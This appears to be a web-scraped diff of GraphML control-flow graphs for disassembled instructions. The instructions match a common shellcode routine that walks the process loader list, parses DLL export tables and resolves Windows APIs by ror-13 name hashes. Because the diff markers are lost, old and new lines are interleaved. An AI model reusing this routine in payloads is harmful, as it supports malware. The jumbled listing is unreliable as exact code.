<node id="block.0x1030:instruction.0x1037">
<data key="address">0x1037</data>
<data key="type">instruction</data>
<data key="instruction.hex">e2ed</data>
<data key="instruction.source">loop 0x1023</data>
<data key="instruction.source">loop 0x1026</data>
</node>
<edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
<edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
<edge source="block.0x1030:instruction.0x1030" target="block.0x1030:instruction.0x1034"/>
<edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
</graph>
</node>
<node id="block.0x1036">
<data key="address">0x1036</data>
<node id="block.0x1039">
<data key="address">0x1039</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1036</data>
<data key="address">0x1039</data>
<data key="type">block</data>
<node id="block.0x1036:instruction.0x1036">
<data key="address">0x1036</data>
<node id="block.0x1039:instruction.0x1039">
<data key="address">0x1039</data>
<data key="type">instruction</data>
<data key="instruction.hex">52</data>
<data key="instruction.source">push rdx</data>
</node>
<node id="block.0x1036:instruction.0x1037">
<data key="address">0x1037</data>
<node id="block.0x1039:instruction.0x103a">
<data key="address">0x103a</data>
<data key="type">instruction</data>
<data key="instruction.hex">4151</data>
<data key="instruction.source">push r9</data>
</node>
<node id="block.0x1036:instruction.0x1039">
<data key="address">0x1039</data>
<node id="block.0x1039:instruction.0x103c">
<data key="address">0x103c</data>
<data key="type">instruction</data>
<data key="instruction.hex">488b5220</data>
<data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
</node>
<node id="block.0x1036:instruction.0x103d">
<data key="address">0x103d</data>
<node id="block.0x1039:instruction.0x1040">
<data key="address">0x1040</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b423c</data>
<data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
</node>
<node id="block.0x1036:instruction.0x1040">
<data key="address">0x1040</data>
<node id="block.0x1039:instruction.0x1043">
<data key="address">0x1043</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d0</data>
<data key="instruction.source">add rax, rdx</data>
</node>
<node id="block.0x1036:instruction.0x1043">
<data key="address">0x1043</data>
<node id="block.0x1039:instruction.0x1046">
<data key="address">0x1046</data>
<data key="type">instruction</data>
<data key="instruction.hex">668178180b02</data>
<data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
</node>
<node id="block.0x1036:instruction.0x1049">
<data key="address">0x1049</data>
<node id="block.0x1039:instruction.0x104c">
<data key="address">0x104c</data>
<data key="type">instruction</data>
<data key="instruction.hex">7572</data>
<data key="instruction.hex">756f</data>
<data key="instruction.source">jne 0x10bd</data>
</node>
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
<edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
<edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
<edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
<edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
<edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
<edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
<edge source="block.0x1039:instruction.0x1043" target="block.0x1039:instruction.0x1046"/>
<edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
</graph>
</node>
<node id="block.0x104b">
<data key="address">0x104b</data>
<node id="block.0x104e">
<data key="address">0x104e</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x104b</data>
<data key="address">0x104e</data>
<data key="type">block</data>
<node id="block.0x104b:instruction.0x104b">
<data key="address">0x104b</data>
<node id="block.0x104e:instruction.0x104e">
<data key="address">0x104e</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b8088000000</data>
<data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
</node>
<node id="block.0x104b:instruction.0x1051">
<data key="address">0x1051</data>
<node id="block.0x104e:instruction.0x1054">
<data key="address">0x1054</data>
<data key="type">instruction</data>
<data key="instruction.hex">4885c0</data>
<data key="instruction.source">test rax, rax</data>
</node>
<node id="block.0x104b:instruction.0x1054">
<data key="address">0x1054</data>
<node id="block.0x104e:instruction.0x1057">
<data key="address">0x1057</data>
<data key="type">instruction</data>
<data key="instruction.hex">7467</data>
<data key="instruction.hex">7464</data>
<data key="instruction.source">je 0x10bd</data>
</node>
<edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
<edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
<edge source="block.0x104e:instruction.0x104e" target="block.0x104e:instruction.0x1054"/>
<edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
</graph>
</node>
<node id="block.0x1056">
<data key="address">0x1056</data>
<node id="block.0x1059">
<data key="address">0x1059</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1056</data>
<data key="address">0x1059</data>
<data key="type">block</data>
<node id="block.0x1056:instruction.0x1056">
<data key="address">0x1056</data>
<node id="block.0x1059:instruction.0x1059">
<data key="address">0x1059</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d0</data>
<data key="instruction.source">add rax, rdx</data>
</node>
<node id="block.0x1056:instruction.0x1059">
<data key="address">0x1059</data>
<node id="block.0x1059:instruction.0x105c">
<data key="address">0x105c</data>
<data key="type">instruction</data>
<data key="instruction.hex">50</data>
<data key="instruction.source">push rax</data>
</node>
<node id="block.0x1056:instruction.0x105a">
<data key="address">0x105a</data>
<node id="block.0x1059:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4818</data>
<data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
</node>
<node id="block.0x1056:instruction.0x105d">
<data key="address">0x105d</data>
<node id="block.0x1059:instruction.0x1060">
<data key="address">0x1060</data>
<data key="type">instruction</data>
<data key="instruction.hex">448b4020</data>
<data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
</node>
<node id="block.0x1056:instruction.0x1061">
<data key="address">0x1061</data>
<node id="block.0x1059:instruction.0x1064">
<data key="address">0x1064</data>
<data key="type">instruction</data>
<data key="instruction.hex">4901d0</data>
<data key="instruction.source">add r8, rdx</data>
</node>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
<edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
<edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
</graph>
</node>
<node id="block.0x1064">
<data key="address">0x1064</data>
<node id="block.0x1067">
<data key="address">0x1067</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1064</data>
<data key="address">0x1067</data>
<data key="type">block</data>
<node id="block.0x1064:instruction.0x1064">
<data key="address">0x1064</data>
<node id="block.0x1067:instruction.0x1067">
<data key="address">0x1067</data>
<data key="type">instruction</data>
<data key="instruction.hex">e356</data>
<data key="instruction.hex">e353</data>
<data key="instruction.source">jrcxz 0x10bc</data>
</node>
</graph>
</node>
<node id="block.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1069">
<data key="address">0x1069</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1066</data>
<data key="address">0x1069</data>
<data key="type">block</data>
<node id="block.0x1066:instruction.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1069:instruction.0x1069">
<data key="address">0x1069</data>
<data key="type">instruction</data>
<data key="instruction.hex">48ffc9</data>
<data key="instruction.source">dec rcx</data>
</node>
<node id="block.0x1066:instruction.0x1069">
<data key="address">0x1069</data>
<node id="block.0x1069:instruction.0x106c">
<data key="address">0x106c</data>
<data key="type">instruction</data>
<data key="instruction.hex">418b3488</data>
<data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
</node>
<node id="block.0x1066:instruction.0x106d">
<data key="address">0x106d</data>
<node id="block.0x1069:instruction.0x1070">
<data key="address">0x1070</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d6</data>
<data key="instruction.source">add rsi, rdx</data>
</node>
<node id="block.0x1066:instruction.0x1070">
<data key="address">0x1070</data>
<node id="block.0x1069:instruction.0x1073">
<data key="address">0x1073</data>
<data key="type">instruction</data>
<data key="instruction.hex">4d31c9</data>
<data key="instruction.source">xor r9, r9</data>
<data key="instruction.hex">448b4c2408</data>
<data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
</node>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
<edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
<edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
</graph>
</node>
<node id="block.0x1073">
<data key="address">0x1073</data>
<node id="block.0x1078">
<data key="address">0x1078</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1073</data>
<data key="address">0x1078</data>
<data key="type">block</data>
<node id="block.0x1073:instruction.0x1073">
<data key="address">0x1073</data>
<node id="block.0x1078:instruction.0x1078">
<data key="address">0x1078</data>
<data key="type">instruction</data>
<data key="instruction.hex">4831c0</data>
<data key="instruction.source">xor rax, rax</data>
</node>
<node id="block.0x1073:instruction.0x1076">
<data key="address">0x1076</data>
<node id="block.0x1078:instruction.0x107b">
<data key="address">0x107b</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
</node>
<node id="block.0x1073:instruction.0x1077">
<data key="address">0x1077</data>
<node id="block.0x1078:instruction.0x107c">
<data key="address">0x107c</data>
<data key="type">instruction</data>
<data key="instruction.hex">41c1c90d</data>
<data key="instruction.source">ror r9d, 0xd</data>
</node>
<node id="block.0x1073:instruction.0x107b">
<data key="address">0x107b</data>
<node id="block.0x1078:instruction.0x1080">
<data key="address">0x1080</data>
<data key="type">instruction</data>
<data key="instruction.hex">4101c1</data>
<data key="instruction.source">add r9d, eax</data>
</node>
<node id="block.0x1073:instruction.0x107e">
<data key="address">0x107e</data>
<node id="block.0x1078:instruction.0x1083">
<data key="address">0x1083</data>
<data key="type">instruction</data>
<data key="instruction.hex">38e0</data>
<data key="instruction.source">cmp al, ah</data>
</node>
<node id="block.0x1073:instruction.0x1080">
<data key="address">0x1080</data>
<node id="block.0x1078:instruction.0x1085">
<data key="address">0x1085</data>
<data key="type">instruction</data>
<data key="instruction.hex">75f1</data>
<data key="instruction.source">jne 0x1073</data>
<data key="instruction.source">jne 0x1078</data>
</node>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
<edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107b"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107c"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1085"/>
<edge source="block.0x1078:instruction.0x1080" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
</graph>
</node>
<node id="block.0x1082">
<data key="address">0x1082</data>
<node id="block.0x1087">
<data key="address">0x1087</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1082</data>
<data key="address">0x1087</data>
<data key="type">block</data>
<node id="block.0x1082:instruction.0x1082">
<data key="address">0x1082</data>
<data key="type">instruction</data>
<data key="instruction.hex">4c034c2408</data>
<data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
</node>
<node id="block.0x1082:instruction.0x1087">
<node id="block.0x1087:instruction.0x1087">
<data key="address">0x1087</data>
<data key="type">instruction</data>
<data key="instruction.hex">4539d1</data>
<data key="instruction.source">cmp r9d, r10d</data>
</node>
<node id="block.0x1082:instruction.0x108a">
<node id="block.0x1087:instruction.0x108a">
<data key="address">0x108a</data>
<data key="type">instruction</data>
<data key="instruction.hex">75d8</data>
<data key="instruction.source">jne 0x1064</data>
<data key="instruction.hex">75db</data>
<data key="instruction.source">jne 0x1067</data>
</node>
<edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
<edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x108a"/>
</graph>
</node>
<node id="block.0x108c">
@@ -640,17 +633,17 @@
</graph>
</node>
<edge source="block.0x1000" target="block.0x1017"/>
<edge source="block.0x1017" target="block.0x1023"/>
<edge source="block.0x1023" target="block.0x102b"/>
<edge source="block.0x102b" target="block.0x102d"/>
<edge source="block.0x102d" target="block.0x1036"/>
<edge source="block.0x1036" target="block.0x104b"/>
<edge source="block.0x104b" target="block.0x1056"/>
<edge source="block.0x1056" target="block.0x1064"/>
<edge source="block.0x1064" target="block.0x1066"/>
<edge source="block.0x1066" target="block.0x1073"/>
<edge source="block.0x1073" target="block.0x1082"/>
<edge source="block.0x1082" target="block.0x108c"/>
<edge source="block.0x1017" target="block.0x1026"/>
<edge source="block.0x1026" target="block.0x102e"/>
<edge source="block.0x102e" target="block.0x1030"/>
<edge source="block.0x1030" target="block.0x1039"/>
<edge source="block.0x1039" target="block.0x104e"/>
<edge source="block.0x104e" target="block.0x1059"/>
<edge source="block.0x1059" target="block.0x1067"/>
<edge source="block.0x1067" target="block.0x1069"/>
<edge source="block.0x1069" target="block.0x1078"/>
<edge source="block.0x1078" target="block.0x1087"/>
<edge source="block.0x1087" target="block.0x108c"/>
<edge source="block.0x108c" target="block.0x10bc"/>
<edge source="block.0x10bc" target="block.0x10bd"/>
</graph>
+251 -258
View File
@@ -69,492 +69,471 @@
<node id="block.0x100f:instruction.0x1012">
<data key="address">0x1012</data>
<data key="type">instruction</data>
<data key="instruction.hex">0fb74a26</data>
<data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
<data key="instruction.hex">0fb74a24</data>
<data key="instruction.source">movzx ecx, word ptr [edx + 0x24]</data>
</node>
<node id="block.0x100f:instruction.0x1016">
<data key="address">0x1016</data>
<data key="type">instruction</data>
<data key="instruction.hex">31ff</data>
<data key="instruction.source">xor edi, edi</data>
<data key="instruction.hex">bf00000000</data>
<data key="instruction.source">mov edi, 0</data>
</node>
</graph>
</node>
<node id="block.0x1018">
<data key="address">0x1018</data>
<node id="block.0x101b">
<data key="address">0x101b</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1018</data>
<data key="address">0x101b</data>
<data key="type">block</data>
<node id="block.0x1018:instruction.0x1018">
<data key="address">0x1018</data>
<node id="block.0x101b:instruction.0x101b">
<data key="address">0x101b</data>
<data key="type">instruction</data>
<data key="instruction.hex">31c0</data>
<data key="instruction.source">xor eax, eax</data>
</node>
<node id="block.0x1018:instruction.0x101a">
<data key="address">0x101a</data>
<node id="block.0x101b:instruction.0x101d">
<data key="address">0x101d</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
</node>
<node id="block.0x1018:instruction.0x101b">
<data key="address">0x101b</data>
<node id="block.0x101b:instruction.0x101e">
<data key="address">0x101e</data>
<data key="type">instruction</data>
<data key="instruction.hex">3c61</data>
<data key="instruction.source">cmp al, 0x61</data>
</node>
<node id="block.0x1018:instruction.0x101d">
<data key="address">0x101d</data>
<node id="block.0x101b:instruction.0x1020">
<data key="address">0x1020</data>
<data key="type">instruction</data>
<data key="instruction.hex">7c02</data>
<data key="instruction.source">jl 0x1021</data>
<data key="instruction.source">jl 0x1024</data>
</node>
<edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
<edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
<edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
<edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
<edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
<edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
</graph>
</node>
<node id="block.0x101f">
<data key="address">0x101f</data>
<node id="block.0x1022">
<data key="address">0x1022</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x101f</data>
<data key="address">0x1022</data>
<data key="type">block</data>
<node id="block.0x101f:instruction.0x101f">
<data key="address">0x101f</data>
<node id="block.0x1022:instruction.0x1022">
<data key="address">0x1022</data>
<data key="type">instruction</data>
<data key="instruction.hex">2c20</data>
<data key="instruction.source">sub al, 0x20</data>
</node>
</graph>
</node>
<node id="block.0x1021">
<data key="address">0x1021</data>
<node id="block.0x1024">
<data key="address">0x1024</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1021</data>
<data key="address">0x1024</data>
<data key="type">block</data>
<node id="block.0x1021:instruction.0x1021">
<data key="address">0x1021</data>
<node id="block.0x1024:instruction.0x1024">
<data key="address">0x1024</data>
<data key="type">instruction</data>
<data key="instruction.hex">c1cf0d</data>
<data key="instruction.source">ror edi, 0xd</data>
</node>
<node id="block.0x1021:instruction.0x1024">
<data key="address">0x1024</data>
<node id="block.0x1024:instruction.0x1027">
<data key="address">0x1027</data>
<data key="type">instruction</data>
<data key="instruction.hex">01c7</data>
<data key="instruction.source">add edi, eax</data>
</node>
<node id="block.0x1021:instruction.0x1026">
<data key="address">0x1026</data>
<node id="block.0x1024:instruction.0x1029">
<data key="address">0x1029</data>
<data key="type">instruction</data>
<data key="instruction.hex">49</data>
<data key="instruction.source">dec ecx</data>
</node>
<node id="block.0x1021:instruction.0x1027">
<data key="address">0x1027</data>
<node id="block.0x1024:instruction.0x102a">
<data key="address">0x102a</data>
<data key="type">instruction</data>
<data key="instruction.hex">75ef</data>
<data key="instruction.source">jne 0x1018</data>
<data key="instruction.source">jne 0x101b</data>
</node>
<edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
<edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
<edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
<edge source="block.0x1024:instruction.0x1024" target="block.0x1024:instruction.0x1027"/>
<edge source="block.0x1024:instruction.0x1027" target="block.0x1024:instruction.0x1029"/>
<edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
</graph>
</node>
<node id="block.0x1029">
<data key="address">0x1029</data>
<node id="block.0x102c">
<data key="address">0x102c</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1029</data>
<data key="address">0x102c</data>
<data key="type">block</data>
<node id="block.0x1029:instruction.0x1029">
<data key="address">0x1029</data>
<node id="block.0x102c:instruction.0x102c">
<data key="address">0x102c</data>
<data key="type">instruction</data>
<data key="instruction.hex">52</data>
<data key="instruction.source">push edx</data>
</node>
<node id="block.0x1029:instruction.0x102a">
<data key="address">0x102a</data>
<node id="block.0x102c:instruction.0x102d">
<data key="address">0x102d</data>
<data key="type">instruction</data>
<data key="instruction.hex">57</data>
<data key="instruction.source">push edi</data>
</node>
<node id="block.0x1029:instruction.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102c:instruction.0x102e">
<data key="address">0x102e</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5210</data>
<data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
</node>
<node id="block.0x1029:instruction.0x102e">
<data key="address">0x102e</data>
<node id="block.0x102c:instruction.0x1031">
<data key="address">0x1031</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b423c</data>
<data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
</node>
<node id="block.0x1029:instruction.0x1031">
<data key="address">0x1031</data>
<node id="block.0x102c:instruction.0x1034">
<data key="address">0x1034</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x1029:instruction.0x1033">
<data key="address">0x1033</data>
<node id="block.0x102c:instruction.0x1036">
<data key="address">0x1036</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4078</data>
<data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
</node>
<node id="block.0x1029:instruction.0x1036">
<data key="address">0x1036</data>
<node id="block.0x102c:instruction.0x1039">
<data key="address">0x1039</data>
<data key="type">instruction</data>
<data key="instruction.hex">85c0</data>
<data key="instruction.source">test eax, eax</data>
</node>
<node id="block.0x1029:instruction.0x1038">
<data key="address">0x1038</data>
<node id="block.0x102c:instruction.0x103b">
<data key="address">0x103b</data>
<data key="type">instruction</data>
<data key="instruction.hex">744c</data>
<data key="instruction.source">je 0x1086</data>
<data key="instruction.hex">744a</data>
<data key="instruction.source">je 0x1087</data>
</node>
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
<edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
<edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
<edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
<edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
<edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
<edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
<edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
<edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
<edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
<edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
</graph>
</node>
<node id="block.0x103a">
<data key="address">0x103a</data>
<node id="block.0x103d">
<data key="address">0x103d</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x103a</data>
<data key="address">0x103d</data>
<data key="type">block</data>
<node id="block.0x103a:instruction.0x103a">
<data key="address">0x103a</data>
<node id="block.0x103d:instruction.0x103d">
<data key="address">0x103d</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x103a:instruction.0x103c">
<data key="address">0x103c</data>
<node id="block.0x103d:instruction.0x103f">
<data key="address">0x103f</data>
<data key="type">instruction</data>
<data key="instruction.hex">50</data>
<data key="instruction.source">push eax</data>
</node>
<node id="block.0x103a:instruction.0x103d">
<data key="address">0x103d</data>
<node id="block.0x103d:instruction.0x1040">
<data key="address">0x1040</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4818</data>
<data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
</node>
<node id="block.0x103a:instruction.0x1040">
<data key="address">0x1040</data>
<node id="block.0x103d:instruction.0x1043">
<data key="address">0x1043</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5820</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
</node>
<node id="block.0x103a:instruction.0x1043">
<data key="address">0x1043</data>
<node id="block.0x103d:instruction.0x1046">
<data key="address">0x1046</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
<edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
<edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
</graph>
</node>
<node id="block.0x1045">
<data key="address">0x1045</data>
<node id="block.0x1048">
<data key="address">0x1048</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1045</data>
<data key="address">0x1048</data>
<data key="type">block</data>
<node id="block.0x1045:instruction.0x1045">
<data key="address">0x1045</data>
<node id="block.0x1048:instruction.0x1048">
<data key="address">0x1048</data>
<data key="type">instruction</data>
<data key="instruction.hex">85c9</data>
<data key="instruction.source">test ecx, ecx</data>
</node>
<node id="block.0x1045:instruction.0x1047">
<data key="address">0x1047</data>
<node id="block.0x1048:instruction.0x104a">
<data key="address">0x104a</data>
<data key="type">instruction</data>
<data key="instruction.hex">743c</data>
<data key="instruction.source">je 0x1085</data>
<data key="instruction.hex">743a</data>
<data key="instruction.source">je 0x1086</data>
</node>
<edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
<edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
</graph>
</node>
<node id="block.0x1049">
<data key="address">0x1049</data>
<node id="block.0x104c">
<data key="address">0x104c</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1049</data>
<data key="address">0x104c</data>
<data key="type">block</data>
<node id="block.0x1049:instruction.0x1049">
<data key="address">0x1049</data>
<node id="block.0x104c:instruction.0x104c">
<data key="address">0x104c</data>
<data key="type">instruction</data>
<data key="instruction.hex">49</data>
<data key="instruction.source">dec ecx</data>
</node>
<node id="block.0x1049:instruction.0x104a">
<data key="address">0x104a</data>
<node id="block.0x104c:instruction.0x104d">
<data key="address">0x104d</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b348b</data>
<data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
</node>
<node id="block.0x1049:instruction.0x104d">
<data key="address">0x104d</data>
<node id="block.0x104c:instruction.0x1050">
<data key="address">0x1050</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d6</data>
<data key="instruction.source">add esi, edx</data>
</node>
<node id="block.0x1049:instruction.0x104f">
<data key="address">0x104f</data>
<node id="block.0x104c:instruction.0x1052">
<data key="address">0x1052</data>
<data key="type">instruction</data>
<data key="instruction.hex">31ff</data>
<data key="instruction.source">xor edi, edi</data>
<data key="instruction.hex">8b7df8</data>
<data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
</node>
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
<edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
<edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
</graph>
</node>
<node id="block.0x1051">
<data key="address">0x1051</data>
<node id="block.0x1055">
<data key="address">0x1055</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1051</data>
<data key="address">0x1055</data>
